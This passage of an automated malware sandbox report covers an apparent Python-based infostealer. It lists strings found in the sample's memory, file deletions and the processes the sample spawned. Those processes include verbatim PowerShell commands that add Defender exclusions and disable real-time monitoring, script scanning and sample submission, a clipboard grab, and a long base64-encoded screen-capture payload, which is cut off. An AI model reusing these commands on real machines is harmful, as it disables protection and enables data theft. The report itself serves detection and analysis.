00000004.00000003.1691548082.00000201CE308000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/tensorflow/datasets/blob/master/tensorflow_datasets/core/utils/resource_utils.py#
                                  Source: based.exe, 00000004.00000002.2383024745.00000201D0940000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/urllib3/urllib3/issues/2192#issuecomment-821832963
                                  Source: based.exe, 00000004.00000003.1857154542.00000201D080A000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000004.00000002.2382426374.00000201D080A000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000004.00000002.2383270970.00000201D0BF5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/urllib3/urllib3/issues/2513#issuecomment-1152559900.
                                  Source: based.exe, 00000004.00000002.2383124519.00000201D0A44000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/urllib3/urllib3/issues/2920
                                  Source: based.exe, 00000004.00000002.2382103514.00000201D04D7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://google.com/
                                  Source: based.exe, 00000004.00000003.1856925245.00000201D04D7000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000004.00000003.1868825454.00000201D04D7000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000004.00000002.2382103514.00000201D04D7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://google.com/mail
                                  Source: based.exe, 00000004.00000002.2381065768.00000201CE28F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://google.com/mail/
                                  Source: based.exe, 00000004.00000002.2382322398.00000201D0640000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://gstatic.com/generate_204
                                  Source: based.exe, 00000004.00000003.1857154542.00000201D075A000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000004.00000002.2382426374.00000201D075A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://html.spec.whatwg.org/multipage/
                                  Source: based.exe, 00000004.00000002.2382103514.00000201D04D7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://httpbin.org/
                                  Source: based.exe, 00000004.00000003.1878813460.00000201D0EC2000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000004.00000002.2386609527.00000201D1138000.00000004.00001000.00020000.00000000.sdmp, based.exe, 00000004.00000003.2358122720.00000201D0EC2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com
                                  Source: based.exe, 00000004.00000002.2387954402.00000201D1C28000.00000004.00001000.00020000.00000000.sdmp, based.exe, 00000004.00000002.2386609527.00000201D10C0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com
                                  Source: powershell.exe, 00000011.00000002.1984485852.0000028A4B4B3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                                  Source: hacn.exe, 00000003.00000002.1735603222.00007FFDFB78F000.00000002.00000001.01000000.0000000B.sdmp, based.exe, 00000004.00000002.2394342718.00007FFDFB31F000.00000040.00000001.01000000.0000000D.sdmpString found in binary or memory: https://python.org/dev/peps/pep-0263/
                                  Source: based.exe, 00000004.00000002.2382322398.00000201D0640000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com/moshiax/minotaur-deepweb/main/image.png
                                  Source: based.exe, 00000002.00000003.1685896467.000001F919A10000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sectigo.com/CPS0
                                  Source: based.exe, 00000004.00000003.1852139141.00000201D081F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org
                                  Source: based.exe, 00000004.00000003.1793100098.00000201D0D3C000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000004.00000003.1755320841.00000201D0C99000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
                                  Source: based.exe, 00000004.00000003.1857154542.00000201D080A000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000004.00000002.2382426374.00000201D080A000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000004.00000003.1745863108.00000201D0CA5000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000004.00000003.1755320841.00000201D0C99000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefox
                                  Source: based.exe, 00000004.00000003.1793100098.00000201D0D3C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
                                  Source: based.exe, 00000004.00000002.2387215842.00000201D157E000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000004.00000003.2357805259.00000201D0F1C000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000004.00000002.2387215842.00000201D1569000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
                                  Source: based.exe, 00000004.00000003.2358410623.00000201D0E91000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples
                                  Source: based.exe, 00000004.00000002.2387215842.00000201D157E000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000004.00000003.2357805259.00000201D0F1C000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000004.00000002.2387215842.00000201D1569000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
                                  Source: based.exe, 00000004.00000003.2358410623.00000201D0E91000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install
                                  Source: based.exe, 00000004.00000002.2381065768.00000201CE28F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tools.ietf.org/html/rfc2388#section-4.4
                                  Source: based.exe, 00000004.00000003.1856925245.00000201D04D7000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000004.00000003.1868825454.00000201D04D7000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000004.00000002.2382103514.00000201D04D7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://twitter.com/
                                  Source: based.exe, 00000004.00000002.2383270970.00000201D0BF5000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000004.00000002.2383124519.00000201D0A44000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://urllib3.readthedocs.io/en/latest/advanced-usage.html#https-proxy-error-http-proxy
                                  Source: based.exe, 00000004.00000002.2386503993.00000201D0F40000.00000004.00001000.00020000.00000000.sdmp, based.exe, 00000004.00000002.2383024745.00000201D0940000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://urllib3.readthedocs.io/en/latest/advanced-usage.html#tls-warnings
                                  Source: based.exe, 00000004.00000002.2386503993.00000201D0F40000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://urllib3.readthedocs.io/en/latest/advanced-usage.html#tls-warningse=Lax0
                                  Source: based.exe, 00000004.00000002.2386609527.00000201D10C0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://weibo.com/
                                  Source: based.exe, 00000004.00000002.2386609527.00000201D10B4000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.aliexpress.com/
                                  Source: based.exe, 00000004.00000002.2386609527.00000201D1074000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.amazon.ca/
                                  Source: based.exe, 00000004.00000002.2386609527.00000201D1074000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.amazon.co.uk/
                                  Source: based.exe, 00000004.00000002.2386609527.00000201D1074000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.amazon.com/
                                  Source: based.exe, 00000004.00000002.2386609527.00000201D1074000.00000004.00001000.00020000.00000000.sdmp, based.exe, 00000004.00000002.2386609527.00000201D1040000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.amazon.de/
                                  Source: based.exe, 00000004.00000002.2386609527.00000201D1074000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.amazon.fr/
                                  Source: based.exe, 00000004.00000002.2386609527.00000201D1074000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.avito.ru/
                                  Source: based.exe, 00000002.00000003.1684490316.000001F919A10000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000002.00000003.1684668275.000001F919A10000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000002.00000003.1684490316.000001F919A1D000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000002.00000003.1683685878.000001F919A10000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.digicert.com/CPS0
                                  Source: based.exe, 00000004.00000003.2357805259.00000201D0F0D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                                  Source: based.exe, 00000004.00000002.2386609527.00000201D10C0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/
                                  Source: based.exe, 00000004.00000002.2386609527.00000201D1074000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/complete/
                                  Source: based.exe, 00000004.00000003.2357805259.00000201D0F0D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                                  Source: based.exe, 00000004.00000002.2386609527.00000201D10B4000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.leboncoin.fr/
                                  Source: based.exe, 00000004.00000003.1834359587.00000201D0CFD000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000004.00000002.2383124519.00000201D0A44000.00000004.00001000.00020000.00000000.sdmp, based.exe, 00000004.00000002.2386609527.00000201D1114000.00000004.00001000.00020000.00000000.sdmp, based.exe, 00000004.00000003.1852139141.00000201D081F000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000004.00000003.1852062681.00000201D0CFD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org
                                  Source: based.exe, 00000004.00000003.1755320841.00000201D0C99000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/
                                  Source: based.exe, 00000004.00000003.1793100098.00000201D0D3C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.VsJpOAWrHqB2
                                  Source: based.exe, 00000004.00000003.1755320841.00000201D0C99000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/
                                  Source: based.exe, 00000004.00000003.1793100098.00000201D0D3C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.n0g9CLHwD9nR
                                  Source: based.exe, 00000004.00000003.1755320841.00000201D0C99000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/
                                  Source: based.exe, 00000004.00000003.1793100098.00000201D0D3C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
                                  Source: based.exe, 00000004.00000003.1793100098.00000201D0D3C000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000004.00000003.1755320841.00000201D0C99000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
                                  Source: based.exe, 00000004.00000003.1818589198.00000201D08D5000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000004.00000003.1761254313.00000201D08D4000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000004.00000003.1794515852.00000201D08D5000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000004.00000003.1832574696.00000201D08D5000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000004.00000003.1857154542.00000201D08D5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/media/img/favicons/mozilla/favicon-196x196.2af054fea211.png
                                  Source: based.exe, 00000004.00000003.1755320841.00000201D0CA3000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000004.00000003.1764789844.00000201D0CA3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/media/img/favicons/mozilla/favicon.d25d81d39065.icox
                                  Source: based.exe, 00000004.00000003.1793100098.00000201D0D3C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
                                  Source: based.exe, 00000004.00000002.2386609527.00000201D1114000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com
                                  Source: based.exe, 00000004.00000002.2386609527.00000201D10C0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.olx.pl/
                                  Source: based.exe, 00000002.00000003.1684668275.000001F919A10000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000004.00000002.2394059861.00007FFDFAFB6000.00000004.00000001.01000000.00000019.sdmp, based.exe, 00000004.00000002.2392435887.00007FFDFAC52000.00000004.00000001.01000000.0000001A.sdmpString found in binary or memory: https://www.openssl.org/H
                                  Source: hacn.exe, 00000001.00000003.1670114307.000002A0E4692000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000002.00000003.1674833152.000001F919A10000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000003.00000003.1690904651.000002075D06D000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000004.00000002.2382322398.00000201D0640000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.python.org/dev/peps/pep-0205/
                                  Source: hacn.exe, 00000003.00000002.1724401558.000002075D178000.00000004.00001000.00020000.00000000.sdmp, based.exe, 00000004.00000002.2382218534.00000201D0540000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.python.org/download/releases/2.3/mro/.
                                  Source: based.exe, 00000004.00000003.1856925245.00000201D04D7000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000004.00000003.1868825454.00000201D04D7000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000004.00000002.2382103514.00000201D04D7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.rfc-editor.org/rfc/rfc8259#section-8.1
                                  Source: based.exe, 00000004.00000002.2386609527.00000201D1074000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.wykop.pl/
                                  Source: based.exe, 00000004.00000002.2386609527.00000201D10C0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.zhihu.com/
                                  Source: based.exe, 00000004.00000003.1856925245.00000201D04D7000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000004.00000003.1868825454.00000201D04D7000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000004.00000002.2382103514.00000201D04D7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://yahoo.com/
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49748 -> 443
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 443
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49748
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow created: window name: CLIPBRDWNDCLASS
                                  Source: C:\Recovery\HpQPPZazcv.exeWindow created: window name: CLIPBRDWNDCLASS

                                  Spam, unwanted Advertisements and Ransom Demands

                                  barindex
                                  Source: C:\ProgramData\Microsoft\based.exeFile deleted: C:\Users\user\AppData\Local\Temp\? ? ? ?\Common Files\Desktop\WUTJSCBCFX.pngJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeFile deleted: C:\Users\user\AppData\Local\Temp\? ? ? ?\Common Files\Desktop\LTKMYBSEYZ.jpgJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeFile deleted: C:\Users\user\AppData\Local\Temp\? ? ? ?\Common Files\Desktop\UOOJJOZIRH.mp3Jump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeFile deleted: C:\Users\user\AppData\Local\Temp\? ? ? ?\Common Files\Desktop\KZWFNRXYKI.jpgJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeFile deleted: C:\Users\user\AppData\Local\Temp\? ? ? ?\Common Files\Desktop\UMMBDNEQBN.jpgJump to behavior

                                  System Summary

                                  barindex
                                  Source: C:\ProgramData\Microsoft\based.exeProcess created: Commandline size = 3647
                                  Source: C:\Windows\System32\cmd.exeProcess created: Commandline size = 3615
                                  Source: C:\Windows\System32\cmd.exeProcess created: Commandline size = 3615
                                  Source: C:\Windows\SysWOW64\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}
                                  Source: C:\Windows\System32\getmac.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
                                  Source: C:\Windows\System32\getmac.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
                                  Source: C:\Windows\System32\getmac.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
                                  Source: C:\Windows\System32\getmac.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
                                  Source: C:\Windows\System32\getmac.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
                                  Source: C:\Windows\System32\getmac.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
                                  Source: C:\Windows\System32\getmac.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
                                  Source: C:\Windows\System32\getmac.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
                                  Source: C:\Windows\System32\getmac.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
                                  Source: C:\Windows\System32\getmac.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
                                  Source: C:\Windows\System32\getmac.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
                                  Source: C:\Windows\System32\getmac.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\based.exe'
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ? ?.scr'
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
                                  Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\oGgyulsi03j6EO3sjCC.bat" "
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-Clipboard
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIAB
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\based.exe'
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ? ?.scr'
                                  Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\oGgyulsi03j6EO3sjCC.bat" "
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-Clipboard
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgA